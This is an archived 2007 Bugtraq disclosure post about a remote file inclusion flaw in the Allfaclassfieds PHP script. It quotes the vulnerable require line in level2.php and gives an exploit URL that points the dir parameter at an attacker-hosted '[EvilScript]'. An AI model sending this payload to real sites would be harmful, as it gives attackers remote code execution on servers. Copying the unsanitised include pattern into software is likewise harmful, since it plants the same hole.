lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-Id: <20070422070830.96724B0DD9@ws4-4.us4.outblaze.com> Date: Sun, 22 Apr 2007 15:08:30 +0800 From: "asdasd asdsadas" <dr.rover@...kermail.com> To: bugtraq@...urityfocus.com Subject: Allfaclassfieds (level2.php dir) remote file inclusion Allfaclassfieds (level2.php dir) remote file inclusion -- Bug Found By Dr.RoVeR -->Arab48 Hacker Contact: Dr.RoVeR@...kerMail.CoM --- Script: allfaclassfieds Download: http://scriptat.com/download.php?sid=718 -- Bug File: level2.php Bug code in line 4: require("$dir/admin/dp.php"); -- Exploit: http://site.com/[path]/admin/setup/level2.php?dir=[EvilScript] -- _______________________________________________ Get your free email from http://www.hackermail.com